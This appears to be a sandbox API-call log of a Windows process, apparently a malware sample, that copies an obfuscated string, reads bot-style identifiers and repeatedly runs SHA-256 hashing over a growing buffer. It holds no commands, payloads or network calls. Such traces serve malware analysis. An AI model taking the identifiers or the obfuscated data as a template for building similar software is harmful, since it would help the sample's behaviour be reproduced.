	[0201.690] lstrcpynW (in: lpString1=0x22ac2e0, lpString2="\x0d\x0a\x59\xbd\x201d\x1c\x13\x44\x6e\xaf\x201c\x0a\x9d\xa5\xcc\x17d\xdd\x65\xa7\x6c\x13\x6f\xe5\xb9\x3b\xae\x7a\x62\xd2\xb5\x13\x79\xd8\xfa\xab\xa2\x04\x2026\x28\x2013\x2022\x77\x28\x24\x25\x27\x2039\x7f\xdb\xf4\x20ac\xe8\x201d\x2122\xe7\x37\xd1\x29\x21\x42\xad\x3f\x76\x04\x203a\x7d\x2013\xde\xad\x2021\xe7\x48\x78\x5b\x1b\x2e\x79\xc2\x07\xe8\x78\x53\x4b\xa5\x2039\xd0\x18\x15\xf6\x6a\x5c\x17d\xc3", iMaxLength=94 | out: lpString1="\x0d\x0a\x59\xbd\x201d\x1c\x13\x44\x6e\xaf\x201c\x0a\x9d\xa5\xcc\x17d\xdd\x65\xa7\x6c\x13\x6f\xe5\xb9\x3b\xae\x7a\x62\xd2\xb5\x13\x79\xd8\xfa\xab\xa2\x04\x2026\x28\x2013\x2022\x77\x28\x24\x25\x27\x2039\x7f\xdb\xf4\x20ac\xe8\x201d\x2122\xe7\x37\xd1\x29\x21\x42\xad\x3f\x76\x04\x203a\x7d\x2013\xde\xad\x2021\xe7\x48\x78\x5b\x1b\x2e\x79\xc2\x07\xe8\x78\x53\x4b\xa5\x2039\xd0\x18\x15\xf6\x6a\x5c\x17d\xc3") returned="\x0d\x0a\x59\xbd\x201d\x1c\x13\x44\x6e\xaf\x201c\x0a\x9d\xa5\xcc\x17d\xdd\x65\xa7\x6c\x13\x6f\xe5\xb9\x3b\xae\x7a\x62\xd2\xb5\x13\x79\xd8\xfa\xab\xa2\x04\x2026\x28\x2013\x2022\x77\x28\x24\x25\x27\x2039\x7f\xdb\xf4\x20ac\xe8\x201d\x2122\xe7\x37\xd1\x29\x21\x42\xad\x3f\x76\x04\x203a\x7d\x2013\xde\xad\x2021\xe7\x48\x78\x5b\x1b\x2e\x79\xc2\x07\xe8\x78\x53\x4b\xa5\x2039\xd0\x18\x15\xf6\x6a\x5c\x17d\xc3"
	[0201.690] lstrlenW (lpString="23") returned 2
	[0201.690] lstrlenW (lpString="tot478") returned 6
	[0201.690] lstrlenW (lpString="ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611") returned 49
	[0201.690] lstrlenW (lpString="1000417") returned 7
	[0201.690] lstrlenW (lpString="1776") returned 4
	[0201.690] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x6f0) returned 0x22d5f58
	[0201.690] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c8cc0) returned 1
	[0201.690] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6a8) returned 1
	[0201.690] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff690) returned 1
	[0201.690] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c7d50) returned 1
	[0201.690] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6d8) returned 1
	[0201.690] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff6c0) returned 1
	[0201.690] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ac2e0) returned 1
	[0201.690] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26934b8) returned 1
	[0201.690] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22eacc8) returned 1
	[0201.690] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26934b8
	[0201.690] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2756bf0
	[0201.690] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.690] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.690] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0201.690] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.691] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693490
	[0201.691] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693490, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693490, pdwDataLen=0x129424) returned 1
	[0201.691] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.691] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.691] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.691] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.691] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0201.691] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.691] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693508
	[0201.691] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693508, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693508, pdwDataLen=0x129424) returned 1
	[0201.691] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.691] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.691] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.691] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.691] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0201.691] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.692] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693530
	[0201.692] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693530, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693530, pdwDataLen=0x129424) returned 1
	[0201.692] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.692] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.692] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.692] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.692] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0201.692] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.692] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693558
	[0201.692] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693558, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693558, pdwDataLen=0x129424) returned 1
	[0201.692] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.692] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.692] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.692] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.692] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0201.692] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.692] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693580
	[0201.693] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693580, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693580, pdwDataLen=0x129424) returned 1
	[0201.693] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.693] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.693] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.693] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.693] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0201.693] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.693] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26935a8
	[0201.693] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26935a8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26935a8, pdwDataLen=0x129424) returned 1
	[0201.693] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.693] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.693] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.694] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.694] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0201.694] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.694] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26935d0
	[0201.694] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26935d0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26935d0, pdwDataLen=0x129424) returned 1
	[0201.694] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.694] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.694] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.694] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.694] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0201.694] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.694] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26935f8
	[0201.694] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26935f8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26935f8, pdwDataLen=0x129424) returned 1
	[0201.694] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.694] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.694] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.695] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.695] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0201.695] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.695] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693620
	[0201.695] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693620, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693620, pdwDataLen=0x129424) returned 1
	[0201.695] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.695] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.695] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.695] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.695] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0201.695] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.695] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693648
	[0201.695] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693648, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693648, pdwDataLen=0x129424) returned 1
	[0201.695] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.695] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.695] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.696] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.696] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0201.696] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.696] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693670
	[0201.696] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693670, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693670, pdwDataLen=0x129424) returned 1
	[0201.696] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.696] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.696] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.696] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.696] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0201.696] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.696] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693698
	[0201.696] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693698, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693698, pdwDataLen=0x129424) returned 1
	[0201.696] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.696] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.696] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.697] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.697] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0201.697] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.697] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26936c0
	[0201.697] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26936c0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26936c0, pdwDataLen=0x129424) returned 1
	[0201.697] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.697] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.697] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.697] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.697] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0201.697] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.697] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26936e8
	[0201.697] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26936e8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26936e8, pdwDataLen=0x129424) returned 1
	[0201.697] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.697] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.697] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.698] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.698] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0201.698] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.698] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693710
	[0201.698] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693710, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693710, pdwDataLen=0x129424) returned 1
	[0201.698] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.698] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.698] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.698] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.698] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0201.698] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.698] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693738
	[0201.698] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693738, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693738, pdwDataLen=0x129424) returned 1
	[0201.698] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.698] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.698] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.699] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.699] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0201.699] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.699] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693760
	[0201.699] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693760, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693760, pdwDataLen=0x129424) returned 1
	[0201.699] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.699] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.699] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.699] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.699] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0201.699] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.699] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693788
	[0201.699] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693788, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693788, pdwDataLen=0x129424) returned 1
	[0201.699] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.699] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.699] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.700] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.700] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0201.700] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.700] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26937b0
	[0201.700] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26937b0, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26937b0, pdwDataLen=0x129424) returned 1
	[0201.700] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.700] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.700] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.700] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.700] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0201.700] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.700] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26937d8
	[0201.700] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x26937d8, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x26937d8, pdwDataLen=0x129424) returned 1
	[0201.700] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.700] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.700] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.701] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.701] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0201.701] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.701] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693800
	[0201.701] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2693800, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693800, pdwDataLen=0x129424) returned 1
	[0201.701] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0201.701] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.701] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.701] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.701] CryptHashData (hHash=0x22b6980, pbData=0x2756bf0, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0201.701] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x4, pbData=0x129424, pdwDataLen=0x129420, dwFlags=0x0 | out: pbData=0x129424, pdwDataLen=0x129420) returned 1
	[0201.701] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2693828
	[0201.701] CryptGetHashParam (in: hHash=0x22b6980, dwParam=0x2, pbData=0x2693828, pdwDataLen=0x129424, dwFlags=0x0 | out: pbData=0x2693828, pdwDataLen=0x129424) returned 1
	[0201.701] CryptDestroyHash (hHash=0x22b6980) returned 1
	[0201.701] CryptReleaseContext (hProv=0x2251f8, dwFlags=0x0) returned 1
	[0201.701] CryptAcquireContextW (in: phProv=0x129428, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129428*=0x2251f8) returned 1
	[0201.702] CryptCreateHash (in: hProv=0x2251f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12942c | out: phHash=0x12942c) returned 1
	[0201.702] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x2e0, dwFlags=0x0) returned 1
